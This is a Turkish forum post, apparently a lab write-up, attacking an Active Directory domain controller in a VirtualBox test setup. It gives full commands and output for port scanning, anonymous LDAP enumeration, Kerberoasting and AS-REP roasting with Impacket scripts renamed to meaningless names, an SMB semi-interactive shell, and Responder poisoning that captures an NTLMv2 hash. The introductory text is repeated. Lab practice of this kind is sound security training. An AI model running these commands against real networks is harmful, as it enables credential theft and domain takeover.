- 8 Nis 2020
- 228
- 83
Herkese merhaba yazıma hoşgeldin dostum.İyi okumalar ve başarılar dilerim.Yazımda eksik ve ilave bişey görürsen lütfen bildirmeyi unutma teşekkürler.
Bizim Karşımızda 3 Adet VM vardır - DC 2019,CLİENT,Kali - Atack
DC üzerinde ilk olarak port taraması yapalım.
Bir şekilde enum yapabilmek için bir kullanıcıya ihtiyaç duyarız. Ancak bazı senaryolarda ldap ile anonymous girişlere izin verildiğini görebilirsiniz.
PS:ADSI EDIT > SERVICES > WINDOWS NT > DIRECTROY SERVICE > dSHEURISTICS 000002 yapın.
Şimdi anonim girişin varlığını deneyelim.
Bu işlem gerçekleştirildikten sonra ANONYMOUS LOGON'da sistemde yoksa eklenmelidir.
Başka bir tool olan git clone GİTHUP ilə birkaç deneme yapalım.
Böyle anonymous girişi yapa bilirsiniz.
Kerberoasting, servis hesaplarının parolalarını kırmak amacıyla kullanılan bir saldırı tekniğidir. Kerberoasting, servislere erişim sağlama, hedef sistem üzerinde hak ve yetki yükseltme ve hedef sistemde kalıcılık sağlama amacıyla kullanılabilir. Bu kısımda ilgilendiğimiz özellik aslında SPN olacaktır.
serviceclass/host
ort.
Dfsr-12F9A27C-BF97-4787-9364-D31B6C55EB04 Distributed File System Replication
SPNs Burada daha fazla ayrıntı görebilirsiniz.
Birçok hizmet var, sadece karıştırmak veya okunabilirliği azaltmak istemiyorum
Harika bir şifremiz var tabi bu uygulaması çok zor bir senaryo.Böyle bir sistem hemen devreye giriyor. Ama biz bu işi öğrenmeye çalışıyoruz. Bunu nasıl yönetebileceğimizi anlamaya çalışıyoruz. Devam edelim...
HASH şifresini John ile kırabilirsin, ama ben şifremi bildiğim için yapmıyorum.Artık giriş yapabiliriz.
AS-REP:
Basit bir ifadeyle ağ üzerinden yetkilendirme yapan bir sistemdir.Bilet tabanlı bir sistemdir.Şifreler değil, ağ üzerinde oluşan trafikte biletler kullanılır.
John ile hash'i kırabilirsin.
Verilen hash'i John ile kırabilirsiniz.
Bizim Karşımızda 3 Adet VM vardır - DC 2019,CLİENT,Kali - Atack
DC üzerinde ilk olarak port taraması yapalım.
Kod:
nmap -p- -A -T4 192.168.100.111
Starting Nmap 7.91 ( https://nmap.org ) at 2021-09-01 14:24 EDT
Nmap scan report for 192.168.100.111
Host is up (0.00093s latency).
Not shown: 65515 filtered ports
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2021-09-01 18:30:41Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: ccc.local, Site: Default-First-Site-Name)
445/tcp open microsoft-ds Windows Server 2016 Standard Evaluation 14393 microsoft-ds (workgroup: CCC)
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: ccc.local, Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp open mc-nmf .NET Message Framing
49666/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49669/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49670/tcp open msrpc Microsoft Windows RPC
49672/tcp open msrpc Microsoft Windows RPC
49687/tcp open msrpc Microsoft Windows RPC
60646/tcp open msrpc Microsoft Windows RPC
MAC Address: 08:00:27:AE:396 (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 2016|2012|Vista|2008|7 (96%)
OS CPE: cpe:/o:microsoft:windows_server_2016 cpe:/o:microsoft:windows_server_2012:r2 cpe:/o:microsoft:windows_vista::- cpe:/o:microsoft:windows_vista::sp1 cpe:/o:microsoft:windows_server_2008::sp1 cpe:/o:microsoft:windows_7
Aggressive OS guesses: Microsoft Windows Server 2016 (96%), Microsoft Windows Server 2012 or Windows Server 2012 R2 (92%), Microsoft Windows Server 2012 R2 (88%), Microsoft Windows Vista SP0 or SP1, Windows Server 2008 SP1, or Windows 7 (87%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 1 hop
Service Info: Host: SRVDC; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: 2h24m35s, deviation: 4h02m29s, median: 4m34s
|_nbstat: NetBIOS name: SRVDC, NetBIOS user: <unknown>, NetBIOS MAC: 08:00:27:ae:39:d6 (Oracle VirtualBox virtual NIC)
| smb-os-discovery:
| OS: Windows Server 2016 Standard Evaluation 14393 (Windows Server 2016 Standard Evaluation 6.3)
| Computer name: SRVDC
| NetBIOS computer name: SRVDC\x00
| Domain name: ccc.local
| Forest name: ccc.local
| FQDN: SRVDC.ccc.local
|_ System time: 2021-09-01T11:31:34-07:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: required
| smb2-security-mode:
| 2.02:
|_ Message signing enabled and required
| smb2-time:
| date: 2021-09-01T18:31:33
|_ start_date: 2021-09-01T17:33:59
TRACEROUTE
HOP RTT ADDRESS
1 0.93 ms 192.168.100.101
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 188.18 seconds[/COLOR][/COLOR]PS:ADSI EDIT > SERVICES > WINDOWS NT > DIRECTROY SERVICE > dSHEURISTICS 000002 yapın.
Şimdi anonim girişin varlığını deneyelim.
Kod:
ldapsearch -x -h 192.168.100.101 -b "DC=ccc,DC=local"[/COLOR][/COLOR][/COLOR]
# extended LDIF
#
# LDAPv3
# base <> (default) with scope subtree
# filter: (objectclass=*)
# requesting: ALL
#
# search result
search: 2
result: 1 Operations error
text: 000004DC: LdapErr: DSID-0C0909AF, comment: In order to perform this opera
tion a successful bind must be completed on the connection., data 0, v3839
# numResponses: 1Başka bir tool olan git clone GİTHUP ilə birkaç deneme yapalım.
Kod:
python3 windapsearch.py -U --dc-ip 192.168.100.101
[+] No username provided. Will try anonymous bind.
[+] Using Domain Controller at: 192.168.100.101
[+] Getting defaultNamingContext from Root DSE
[+] Found: DC=ccc,DC=local
[+] Attempting bind
[+] ...success! Binded as:
[+] None
[+] Enumerating all AD users
[!] Error retrieving users
[!] {'desc': 'Operations error', 'info': '000004DC: LdapErr: DSID-0C0909AF, comment: In order to perform this operation a successful bind must be completed on the connection., data 0, v3839'}Kerberoasting, servis hesaplarının parolalarını kırmak amacıyla kullanılan bir saldırı tekniğidir. Kerberoasting, servislere erişim sağlama, hedef sistem üzerinde hak ve yetki yükseltme ve hedef sistemde kalıcılık sağlama amacıyla kullanılabilir. Bu kısımda ilgilendiğimiz özellik aslında SPN olacaktır.
serviceclass/host
ort.Dfsr-12F9A27C-BF97-4787-9364-D31B6C55EB04 Distributed File System Replication
SPNs Burada daha fazla ayrıntı görebilirsiniz.
Birçok hizmet var, sadece karıştırmak veya okunabilirliği azaltmak istemiyorum
Kod:
python3 windapsearch.py -U --user-spns --dc-ip 192.168.100.101 -u [email protected] -p Şifrem (Politika için kişisel bir şifre belirledim)
[+] Using Domain Controller at: 192.168.100.101
[+] Getting defaultNamingContext from Root DSE
[+] Found: DC=ccc,DC=local
[+] Attempting bind
[+] ...success! Binded as:
[+] u:CCC\alice
[+] Enumerating all AD users
[+] Found 8 users
cn: Administrator
cn: Guest
cn: DefaultAccount
cn: krbtgt
cn: Alice Princess
userPrincipalName: [email protected]
cn: Shrek Shrek
userPrincipalName: [email protected]
cn: Mark Man
userPrincipalName: [email protected]
cn: SQL Database
userPrincipalName: [email protected]
[+] Attempting to enumerate all User objects with SPNs
[+] Found 1 Users with SPNs:
CN=SQL Database,CN=Users,DC=ccc,DC=local
[*] Bye!
Kod:
─# python3 sss -request -dc-ip 192.168.100.101 ccc.local/administrator
Impacket v0.9.24.dev1+20210827.162957.5aa97fa7 - Copyright 2021 SecureAuth Corporation
Password:
ServicePrincipalName Name MemberOf PasswordLastSet LastLogon Delegation
-------------------------------- ----------- ------------------------------------------------------- -------------------------- --------- ----------
SRVDC/sqldatabase.ccc.local:1337 sqldatabase CN=Group Policy Creator Owners,CN=Users,DC=ccc,DC=local 2021-09-01 13:45:05.665182 <never>
$krb5tgs$23$*sqldatabase$CCC.LOCAL$ccc.local/sqldatabase*$2d903a5247d3c1fef115526868e07924$d539a8ab1dc51b4fc193cb6ce4c2a12eb9506c657b76546598fda7caaf26229742be7226a57094e27c3e2e5e6c4432de9e6d6949e1bc7715587f33e8db4826b76471824a70561b9663142f36ed369320e75ad69262e2f03634b30b02685bc2c3a6227d997255109d1be66b3b51a94c527d490727679c1b9b8c0016ae03a46bf1754fb139f7dc9cd080121adbce6f82f15de8562aefb469d0c72f0ad4f4cbfaa762fba6f1c91de113db28e435b54fe1e5edeb07ee189c6c24e4eacc2679fccd82b3724726f23d3a8de1657cda6d56f2f74f4f94c06fba697b0cf5982d1e0723c16f53906f918e525c4fb9e94a54af00c8f25a2ddca98ff16adc187f9674d4c6590b9ae7167ba8feb401c5911988212be2502b967e8dc2839e1014915d6a5012f7695357260ce174b222fa41005bc2282f44e9ba7b44e4562d70d78a42ecba763e716ae90c11d76cb4d0bee1e5c128ddd953b2af848b6ed15b24c20e25a0c1a49b043141f406a09b2d5f2a92b42406c4e65b495f9bc19b0b2ac3493aea4c35abe2eac4910401f7567d52e1543e8fb35a6b0f05f58036208e763e6a2c89f32dbd93d1cd6d610eb8e645540ddda864ecde9173d96b1cc8c7fcae670a7e7981e426b8dd051a3e4896595207bc100a338e7673adf8048e44380a2c3ec49d6637b11c5d8ae2959fa0163db0eb97550d82873c92d04b073a14473af23509df262874fa3df2f6a07737efbeb3ade8e18e1ec6cd0b45c8f5c377c8761a883409708f3ad4e00adb5719cf338f80950fe8435663510f063a2cd01997c911261f793a2ab1eb49178dd21c60854dd99909f3a4741f277dcafd660afb810216fc041c4c1526e04674d48eb1e52eba5a37e6f56fb0a5a5226951a7903dc4f0803a1d2b13bc00835e5b51f832ed29125050cdf7978333cab562aa00b1fe45f513d1a12f5d584455e06674b0999009efb4b4c0df98ff1d9be3e102ec221871f0205d84d13949eb6aa364197e9ea3898ff1769a5766c92c5fb3af20cebdf06770323c9bb562509f37fe4253d4e043959096e745f33d2ace060a122c138d87d9f0aa23e920ea410141aa0bf60b0d8b45fab993a28d7c985ff5a59c96e620d6260f528e4683ebcc12c7f6562bff62b843355f4116a86ed21f67270c40f1b72fc93fe5cefca26bc669005007ff2586a2374837825e008782bd414bc649877c2dbca0afa530ca32be7325b28daa16f1a4697f256f534bc52801314f82065b488457fa3b9d8344cc7f528ed6ad1600a967887357418de5931082724a329eddbae3eb6cef75edd039c607977b5ec3d8a090c5beced226defa44a8c4f3229595409e0fe282c0a3620757f54d7de20266e8ac3a80029bcbaf889c2847de6d006555b8836960f1e8ee6c53f5acc4c3d7da960b4b5a11e567e56665c2940bc1301af971d1b5
Kod:
└─# python3 ddd.py ccc/administrator:[email protected]
Impacket v0.9.24.dev1+20210827.162957.5aa97fa7 - Copyright 2021 SecureAuth Corporation
[*] SMBv3.0 dialect used
[!] Launching semi-interactive shell - Careful what you execute
[!] Press help for extra shell commands
C:\>Basit bir ifadeyle ağ üzerinden yetkilendirme yapan bir sistemdir.Bilet tabanlı bir sistemdir.Şifreler değil, ağ üzerinde oluşan trafikte biletler kullanılır.
Kod:
python3 jjj.py ccc.local/administrator -request
Impacket v0.9.24.dev1+20210720.100427.cd4fe47c - Copyright 2021 SecureAuth Corporation
Password:
Name MemberOf PasswordLastSet LastLogon UAC
-------- ------------------------------------------- -------------------------- --------- --------
Administrator CN=Adminstrator,CN=Users,DC=ccc,DC=local 2021-07-21 06:45:46.182240 <never> 0x410200
[email protected]:7f9c1e197d5e5e4b5944e68427c83d71$fbc33d008b8564a4a69c06be4dbddaba01a65b316a94102df96b59bc1bbeb7c99022e4f2229721010f22032abbf42e9dcda42352eb140bf2998b6dfcd5dfb9d25089e3a1cbbbd29ee9ad84523bcf68541c965d4c79589492c93b33b74395b427e9063be7b9e507d51cb02911e37d38013794f6381fd47ecd3180d6a50a15d297925c8d9615829ff49a5644c93b72c0674f700d1cce27f39d704de0d436a4b644559fd7636db8c9ce9cee2f86ccab8e2fdd7afd1aa76406120a7df2a602f722d0d2790666fdbd20f9c4316186f9783bce61807c2bd9dfa07bf965330ec98ce3da8aa55f1d27cbed996d46
Kod:
responder -I eth0 -rdwv
__
.----.-----.-----.-----.-----.-----.--| |.-----.----.
| _| -__|__ --| _ | _ | | _ || -__| _|
|__| |_____|_____| __|_____|__|__|_____||_____|__|
|__|
NBT-NS, LLMNR & MDNS Responder 3.0.6.0
Author: Laurent Gaffie ([email protected])
To kill this script hit CTRL-C
[+] Poisoners:
LLMNR [ON]
NBT-NS [ON]
DNS/MDNS [ON]
[+] Servers:
HTTP server [ON]
HTTPS server [ON]
WPAD proxy [ON]
Auth proxy [OFF]
SMB server [ON]
Kerberos server [ON]
SQL server [ON]
FTP server [ON]
IMAP server [ON]
POP3 server [ON]
SMTP server [ON]
DNS server [ON]
LDAP server [ON]
RDP server [ON]
DCE-RPC server [ON]
WinRM server [ON]
[+] HTTP Options:
Always serving EXE [OFF]
Serving EXE [OFF]
Serving HTML [OFF]
Upstream Proxy [OFF]
[+] Poisoning Options:
Analyze Mode [OFF]
Force WPAD auth [OFF]
Force Basic Auth [OFF]
Force LM downgrade [OFF]
Fingerprint hosts [OFF]
[+] Generic Options:
Responder NIC [eth0]
Responder IP [192.168.100.201]
Challenge set [random]
Don't Respond To Names ['ISATAP']
[+] Current Session Variables:
Responder Machine Name [WIN-TUWG92WLJ8N]
Responder Domain Name [2N0L.LOCAL]
Responder DCE-RPC Port [46021]
[+] Listening for events...
[*] [NBT-NS] Poisoned answer sent to 192.168.100.101 for name (service: File Server)
[*] [LLMNR] Poisoned answer sent to 192.168.100.101 for name
[*] [LLMNR] Poisoned answer sent to 192.168.100.101 for name
[SMB] NTLMv2-SSP Client : 192.168.100.101
[SMB] NTLMv2-SSP Username : CCC\Administrator
[SMB] NTLMv2-SSP Hash : Administrator::CCC:f2501f1d591a27d6:7C9F19B3358745BFE3D114841A4AFBC4:010100000000000080D276C851A2D7017D14D0D633EBE44D0000000002000800520057005A00450001001E00570049004E002D00310034005A00570034005A0057004600550049005A0004003400570049004E002D00310034005A00570034005A0057004600550049005A002E00520057005A0045002E004C004F00430041004C0003001400520057005A0045002E004C004F00430041004C0005001400520057005A0045002E004C004F00430041004C000700080080D276C851A2D701060004000200000008003000300000000000000000000000003000005A17CDBB632790A8C90056ECE36E70F21B2D68EE70875D078D07ADD10C02B0470A001000000000000000000000000000000000000900140063006900660073002F00730061
Son düzenleme:
